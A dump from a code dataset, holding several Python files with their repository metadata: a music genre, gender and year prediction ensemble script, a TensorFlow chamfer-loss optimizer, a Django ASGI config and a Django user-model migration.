def ensemble(scores1, scores2):
ss1 = scores1.sum(axis=0).reshape([1,-1])
ss2 = scores2.sum(axis=0).reshape([1,-1])
ss1 = softmax(ss1)
ss2 = softmax(ss2)
final_scores = ss1 + ss2
final_pred = np.argmax(final_scores)
return final_pred
def predict_genre(feat1, feat2, ann, cnn, cls_to_id, id_to_cls, mean1, mean2):
# ann
preds1, scores1 = ann.predict(feat1 - mean1)
final_pred1 = sum_score(scores1)
# cnn
preds2, scores2 = cnn.predict(feat2 - mean2)
final_pred2 = sum_score(scores2)
# ensemble
ensemble_pred = ensemble(scores1, scores2)
print('--------------Genre Prediction--------------')
print('FeatureExtraction1: %s' %id_to_cls[final_pred1])
print('FeatureExtraction2: %s' %id_to_cls[final_pred2])
print('Ensemble: %s' %id_to_cls[ensemble_pred])
def predict_gender(feat1, feat2, ann, cnn, cls_to_id, id_to_cls, mean1, mean2):
# ann
preds1, scores1 = ann.predict(feat1 - mean1)
final_pred1 = sum_score(scores1)
# cnn
preds2, scores2 = cnn.predict(feat2 - mean2)
final_pred2 = sum_score(scores2)
# ensemble
ensemble_pred = ensemble(scores1, scores2)
print('--------------Gender Prediction--------------')
print('FeatureExtraction1: %s' %id_to_cls[final_pred1])
print('FeatureExtraction2: %s' %id_to_cls[final_pred2])
print('Ensemble: %s' %id_to_cls[ensemble_pred])
def predict_year(feat1, feat2, ann, cnn, cls_to_id, id_to_cls, mean1, mean2):
# ann
preds1, scores1 = ann.predict(feat1 - mean1)
final_pred1 = sum_score(scores1)
# cnn
preds2, scores2 = cnn.predict(feat2 - mean2)
final_pred2 = sum_score(scores2)
# ensemble
ensemble_pred = ensemble(scores1, scores2)
print('--------------Year Prediction--------------')
print('FeatureExtraction1: %s (%s)' %(id_to_cls[final_pred1], id_to_cls[final_pred1]))
print('FeatureExtraction2: %s (%s)' %(id_to_cls[final_pred2], id_to_cls[final_pred2]))
print('Ensemble: %s (%s)' %(id_to_cls[ensemble_pred], id_to_cls[ensemble_pred]))
if __name__ == '__main__':
len(sys.argv) == 2, 'Path to folder containing the songs need to be provided'
song_folder = sys.argv[1]
# ./data/6th Nov/genre/songs
genre_ann, genre_cnn = load_models('Genre_fold_1')
genre_cls_to_id, genre_id_to_cls, genre_ann_mean, genre_cnn_mean = get_utils('Genre_fold_1')
ft1, ft2 = init_ft('Genre_fold_1')
gender_ann, gender_cnn = load_models('Gender_fold_1')
gender_cls_to_id, gender_id_to_cls, gender_ann_mean, gender_cnn_mean = get_utils('Gender_fold_1')
year_ann, year_cnn = load_models('Year_fold_1')
year_cls_to_id, year_id_to_cls, year_ann_mean, year_cnn_mean = get_utils('Year_fold_1')
year_cls_to_id, year_id_to_cls, _ = build_label_map_year2decade(year_cls_to_id)
filenames = os.listdir(song_folder)
for fname in filenames:
fname = fname.strip()
if not fname.endswith('.mp3'):
continue
print('--------------------------------------------')
print(fname)
print('Extracting Feature 1 ...')
feat1 = ft1.extract_feature(os.path.join(song_folder, fname))
print('Extracting Feature 2 ...')
feat2 = ft2.extract_spectrogram(os.path.join(song_folder, fname))
print('Done.')
predict_genre(feat1, feat2, genre_ann, genre_cnn, genre_cls_to_id, genre_id_to_cls, genre_ann_mean, genre_cnn_mean)
predict_gender(feat1, feat2, gender_ann, gender_cnn, gender_cls_to_id, gender_id_to_cls, gender_ann_mean, gender_cnn_mean)
predict_year(feat1, feat2, year_ann, year_cnn, year_cls_to_id, year_id_to_cls, year_ann_mean, year_cnn_mean)
input("Press Enter to continue...")
|
[
"31593907+Alroomi@users.noreply.github.com"
] |
31593907+Alroomi@users.noreply.github.com
|
23ad3618568496efcd28687742ed0ff95e48fa3b
|
ad29d032cc11757584629d221dc4748cd5d8c5eb
|
/optimizer.py
|
e14ba389c1a30a92099b2e03553d99a932b71a44
|
[] |
no_license
|
joalmei/Img2Mesh
|
58b26354f36081e474d20b88f2ec0d0d47ee2add
|
7299c069ac0f88e9ff9d29ece939ca4df1c05016
|
refs/heads/master
| 2022-03-24T11:21:36.882254
| 2019-12-05T13:56:17
| 2019-12-05T13:56:17
| 222,305,444
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,503
|
py
|
import tensorflow as tf
from tensorflow import keras
import tensorflow.keras.backend as K
import time
import random
import matplotlib.pyplot as plt
from operator import itemgetter
from losses import chamfer_loss
from tools.optim_tools import shuffle_tensors
# ==============================================================================
# custom optimizer for chamfer_loss
# using Adam optimization algorithm
class Optimizer:
def __init__ (self, model, learning_rate=0.001):
self.model = model
self.optimizer = keras.optimizers.Adam(learning_rate=learning_rate)
# ==========================================================================
def loss (self, xs, ys):
out = []
ys_ = self.model(xs)
for y, y_ in zip(ys, ys_):
out.append(chamfer_loss(y, y_))
return tf.stack(out)
# =========================================================================
def predict (self, X):
return self.model(X)
# =========================================================================
def test (self, X, Y):
return self.loss(X, Y)
# =========================================================================
def grad (self, xs, ys):
with tf.GradientTape() as tape:
loss_value = self.loss(xs, ys)
return loss_value, tape.gradient(loss_value, self.model.trainable_variables)
# =========================================================================
# trains the network for num_epochs epochs or until min_step is achieved
def train_epochs (self, X, Y, batches,
num_epochs=2000, min_error=1e-3, min_step=1e-9,
checkpoint_callback=None, check_step=1):
train_loss_results = []
for epoch in range(num_epochs):
loss_value, nbatch, prevbatch, start_time = 0, 0, 0, time.time()
X, Y = shuffle_tensors(X, Y)
print("batches: ", end='')
for batch in batches:
nbatch = nbatch + 1
if (int(10*nbatch/len(batches)) > prevbatch):
prevbatch = int(10*nbatch/len(batches))
print('.', end='')
# optimize the model
lossv, grads = self.grad(X[batch], Y[batch])
self.optimizer.apply_gradients(zip(grads, self.model.trainable_variables))
# end epoch
loss_value = K.mean(lossv) + loss_value
loss_value = loss_value / len(batches)
train_loss_results.append(loss_value)
print(' ', end=' ')
if (epoch % check_step == 0):
print("epoch : ", epoch,
" ; loss = ", float(loss_value),
" (", time.time() - start_time ,"secs)")
if (checkpoint_callback != None):
checkpoint_callback(self.model)
if (epoch % check_step == 0 and epoch > 1 and loss_value < min_error):
print('min_error achieved at ', float(loss_value))
return train_loss_results, True
return train_loss_results, False
# =========================================================================
# trains the network max_repet times for num_epochs
def train (self, X, Y, batches,
min_error=1e-3, min_step=1e-3, plot=False,
checkpoint_callback=None,
num_epochs=10,
max_repets=10):
losses = []
interrupt = False
repet = 0
while (not interrupt):
repet = repet + 1
if (repet > max_repets):
break
print("========================================================================")
loss, interrupt = self.train_epochs(X, Y, batches,
num_epochs=num_epochs,
min_error=min_error,
min_step=min_step,
checkpoint_callback=checkpoint_callback)
losses.extend(loss)
if (plot == True):
plt.plot(losses)
plt.plot(loss, label=str(repet))
plt.show()
print("Trainning finished!")
if (plot == True):
plt.plot(losses)
plt.show()
return losses
|
[
"jv.aaguiar@gmail.com"
] |
jv.aaguiar@gmail.com
|
3d7c1eb1ed4087a49c6fea97eca35696c9b6f325
|
cf9484ee1147172138c702a95a6fe2fe862a9f58
|
/TravelBlog/asgi.py
|
dd4c115a3066fe06bd1aaf312488f8a7c6dca6a5
|
[] |
no_license
|
crankshaft1099/Travel-Blog
|
428ab46760c6546ae44a9f3d3d756a0daae0d6b6
|
4c6c2a8399946a02cedc38e9e4a1e80279d90869
|
refs/heads/main
| 2023-03-11T22:01:16.704635
| 2021-03-05T17:48:13
| 2021-03-05T17:48:13
| 344,887,935
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 413
|
py
|
"""
ASGI config for TravelBlog project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TravelBlog.settings')
application = get_asgi_application()
|
[
"noreply@github.com"
] |
noreply@github.com
|
e0cc11f8c458f81ac2d8596c43ac6e0a26ec20a7
|
0692fe679d6ecd9a8b004c5223937f03f374237a
|
/vkcpa/migrations/0001_initial.py
|
930653a5f9df40bc70dcebc3bb7814a6db820c0f
|
[] |
no_license
|
DmitryVesennyi/vkcpa
|
0a23c411ca5e417e2d646b9f3a7ef477194731a1
|
21540f48ffea2f8333a92441beecf6696db4a508
|
refs/heads/master
| 2021-09-05T00:27:42.740029
| 2018-01-23T03:58:25
| 2018-01-23T03:58:25
| 118,547,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 948
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Users',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('user_id', models.BigIntegerField()),
('name', models.CharField(max_length=255, verbose_name='\u0418\u043c\u044f')),
('surname', models.CharField(max_length=255, verbose_name='\u0424\u0430\u043c\u0438\u043b\u0438\u044f', blank=True)),
('start_date', models.DateTimeField(auto_now_add=True)),
('hashmd5', models.CharField(max_length=255, verbose_name='\u0425\u0435\u0448')),
],
options={
},
bases=(models.Model,),
),
]
|
[
"press.83@list.ru"
] |
press.83@list.ru
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.